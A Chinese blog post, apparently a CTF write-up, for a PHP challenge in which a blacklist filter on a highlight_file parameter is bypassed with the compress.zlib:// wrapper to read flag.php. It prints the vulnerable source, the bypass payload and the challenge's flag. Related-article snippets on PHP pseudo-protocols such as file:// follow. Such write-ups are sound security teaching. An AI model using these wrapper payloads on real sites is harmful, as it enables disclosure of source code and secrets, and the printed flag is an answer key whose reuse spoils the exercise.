PHP-zlib协议

于 2025-02-27 22:29:35 发布
阅读量261 收藏 2
点赞数 5
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/asdfaa/article/details/125938378
版权

[题目信息]:

题目名称题目难度
PHP-zlib协议1

[题目考点]:

zlib: 的功能类似 gzopen(),但是其数据流还能被 fread() 和其他文件系统函数使用。

[Flag格式]:

SangFor{J5u2yaCzHtmCTKukEMHVnKPKGJZOnnqY}

[环境部署]:

docker-compose.yml文件或者docker tar原始文件。

http://分配ip:2057

[题目writeup]:

1、实验主页

2、题解分析

<?php
highlight_file(__FILE__);
error_reporting(0);
function filter($file){
    if(preg_match('/filter|\.\.\/|http|https|data|data|rot13|base64|string/i',$file)){
        die('hacker!');
    }else{
        return $file;
    }
}
$file=$_GET['file'];
if(! is_file($file)){
    highlight_file(filter($file));
}else{
    echo "hacker!";
}

分析代码逻辑,与上一题相同。首先定义了filter()方法对用户输入进行验证和过滤,不能含有正则表达式当中的字符串,并且过滤了上一题所使用的filter。

在第二个if条件判断中,如果传入的值不是正常存在的文件,并且通过filter()方法检验通过即可调用highlight_file打印源码。

可以使用其他协议进行绕过,例如zlib协议

?file=compress.zlib://flag.php

php简单开启gzip压缩方法(zlib.output_compression)
10-27
网上的教程基本是你抄我来我抄他,不外乎加头加尾或者自构函数两种写法。实际上每个php页面都要去加代码——当然也可以include引用,不过总显得略微麻烦
安装配置php-fpm来搭建Nginx+PHP的生产环境
09-30
这段配置告诉Nginx,所有以.php结尾的请求应该通过FastCGI协议转发到本地的9000端口,这是默认的php-fpm监听端口。 最后,重启Nginx和php-fpm服务,确保新配置生效。在生产环境中,通常还需要考虑日志监控、错误...
PHP常用伪协议
L1ni01
09-17 305
.(file://协议) PHP.ini: file:// 协议在双off的情况下也可以正常使用; allow_url_fopen :off/on allow_url_include:off/on file:// 用于访问本地文件系统,在CTF中通常用来读取本地文件的且不受allow_url_fopen与allow_url_include的影响 file:// [文件的绝对路径和文件名] 例如 http://127.0.0.1/cmd.php?file=file://D:/soft/phpStudy/WW
使用PHP自带zlib函数 几行代码实现PHP文件打包下载zip
weixin_34364071的博客
03-22 263
&lt;?php //获取文件列表 function list_dir($dir){ $result = array(); if (is_dir($dir)){ $file_dir = scandir($dir); foreach($file_dir as $file){ if ($file == '.' || $file...
iis php 开启gzip_PHP开启gzip页面压缩实例代码
weixin_30798713的博客
03-09 137
GZIP(GNU-ZIP)是一种压缩技术。经过GZIP压缩后页面大小可以变为原来的30%甚至更小。这样用户浏览的时候就会感觉很爽很愉快!要实现GZIP压缩页面需要浏览器和服务器共同支持,实际上就是服务器压缩,传到浏览器后浏览器解压并解析。浏览器那边不需要我们担心,因为现在绝大多数浏览器都支持解析GZIP过的页面。我们只要把页面在服务器端压缩再输出到浏览器就行了。有点罗嗦,下面说正事:正如要制作压缩...
PHPzlib压缩工具扩展包学习
硬核项目经理
11-16 1809
PHPzlib压缩工具扩展包学习总算到了我们压缩相关扩展的最后一篇文章了,最后我们要学习的也是 Linux 下非常常用的一种压缩格式:.gz 的压缩扩展。作为 PHP 的自带扩展,就像...
z_file.rar_.Z压缩_z-file_zlib_zlib 压缩文件_文件压缩
09-14
zlib是一个开源的、跨平台的压缩库,被广泛应用于各种软件和操作系统中,包括HTTP协议中的gzip压缩。 zlib是我们的下一个焦点。这是一个由Jean-loup Gailly和Mark Adler开发的C语言库,主要用于提供数据压缩功能。...
PHP协议相关 -.pdf
最新发布
02-24
### PHP协议相关知识点 #### 一、PHP协议简介 在PHP中,伪协议(pseudo-protocol)是一种特殊的协议,允许用户通过特定的语法结构访问文件或执行其他操作,而无需实际的网络请求。这些伪协议主要用于简化本地...
PHP zlib扩展实现页面GZIP压缩输出
10-29
标题中提到的“PHP zlib扩展实现页面GZIP压缩输出”涉及的知识点主要包含了PHP编程、zlib扩展、GZIP压缩技术以及HTTP协议相关的头部信息处理。下面将详细解释这些知识点: 1. PHP编程语言PHP是一种广泛使用的...
zlib 封装简单接口使用
12-23
实际应用中有时候会遇到需要处理 ZIP 压缩解压的情况,这时候我们有大概三种选择: 调用 rar.exe, unzip.exe 等 使用某现成库 完全手写 第一种虽然能完成任务,但是没法知晓结果。曾经有人对说,可以抓命令行输出结果来判断……这种依靠界面文字来进行精确判断的行为个人认为相当不靠谱。第三种,既然我是个“造轮主义”者,当然说好,但是现在我不了解 ZIP 格式,也不了解 ZIP 算法,所以这个日后再说。今天我们就来切切实实地用一次轮子。 ZIP 相关的库中比较有名的可能就是 ZLib 和 InfoZip(unzip60)了。InfoZip 我了解的不多,其外层接口似乎也不大好,一堆回调——回调是个很烦人的东西,专门用来打乱代码结构。另外,这个库也已经有好多年没更新了吧,太久的东西给人的感觉总是不太舒服。ZLib 最新版本是 1.2.5,今年 4 月 19 日出的。确切的说,ZLib 可能并不是一个针对 ZIP 文件的库,它只是一个针对 gzip 以及 deflate 算法的库。它提供了一个叫做 minizip (contrib\minizip) 例子来给出操作 ZIP 文件的方法。下文将从 ZLib 出发,归结出两个傻瓜接口: BOOL ZipCompress(LPCTSTR lpszSourceFiles, LPCTSTR lpszDestFile); BOOL ZipExtract(LPCTSTR lpszSourceFile, LPCTSTR lpszDestFolder);
源码安装指南:pcre-8.37与zlib-1.2.8压缩包的使用
PCRE库在很多编程语言中被用来实现正则表达式功能,包括C/C++、PHP和R等。 **2. 正则表达式功能** - 正则表达式是一种强大的文本处理工具,用于匹配、搜索、替换和操作字符串。PCRE提供了丰富的正则表达式语法,...
zlib://封装协议
beyond__devil的博客
10-19 2237
支持的协议和封装协议->zlib:// zlib://封装协议,包含3个协议,正好对应的是 '压缩与归档扩展' 里的3个扩展:     zlib://(目前使用:compress.zlib://) - 对应 'zlib' 扩展     bzip2://(目前使用:compress.bzip2://) - 对应 'bzip2' 扩展     zip:// - 对应 'zip' 扩展
php zlib 解压缩,使用phpzlib压缩和解压缩swf文件
weixin_32565397的博客
03-11 314
我在以前写过怎么使用c#来压缩和解压缩swf文件,解压缩,压缩和读取flash头文件信息需要使用一个开源的链接库,而且使用起来也不是很方便,但是使用php就不一样了,php包含了zlib的链接库,可以直接使用其相关功能,下面是我写的压缩和结压缩swf文件的例子://没有加入判定swf文件是否已经压缩,入需要可以根据文件的第一个字节是'F'或者'C'来判定压缩swf文件://------------...
常用开源协议zlib/libpng License
热门推荐
痞子龙3D编程
03-14 1万+
<br />模板如下:<br />Copyright (c) <year> <copyright holders><br />This software is provided 'as-is', without any express or implied<br />warranty. In no event will the authors be held liable for any damages<br />arising from the use of this software.<br />(本软
php zlib模块,tar/zlib算法实现模块_PHP
weixin_34805367的博客
03-10 258
/*copyright (c) 2001 xinshi allrights reservedhttp://xinshi.orgmailto:y10k@963.netoicq:6795798*/Class tarlib {var $tarname = ';var $filehand = 0;function checkcompress() {global $_dofunc_open, $_dofun...
php zlib.output_compression_level,zlib.output_compression比ob_gzhandler效率高
u010227042的博客
05-10 420
zlib.output_compression和ob_gzhandler是php代码压缩的方法,通过使用这两个方法,可以实现php代码的gzip压缩。不过,这两个方法哪个更好呢?哪个效率更高呢?在编程中我们应该怎样选择?这都是程序员应该考虑的问题。 zlib.output_compression比ob_gzhandler效率高 其实,虽然zlib.output_compression和ob_gzhandler都可以进行php代码压缩,但它们的处理方式是不同的。 1)zlib.output_compre
php zlib扩展安装(finall)
夸父博客
08-04 474
2. 修改php.ini 加入 sudo vim /usr/local/php/etc/php.ini。1、进入扩展源码目录cd php源码/ext/zlib/
php协议zlib
10-16
php协议zlib是一种用于压缩和解压缩数据的方法,可以在读写文件时使用。使用该协议时,可以通过在文件路径前加上"compress.zlib://"或"gzip://"来指定使用zlib或gzip压缩。例如,使用"compress.zlib://test.txt"来...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值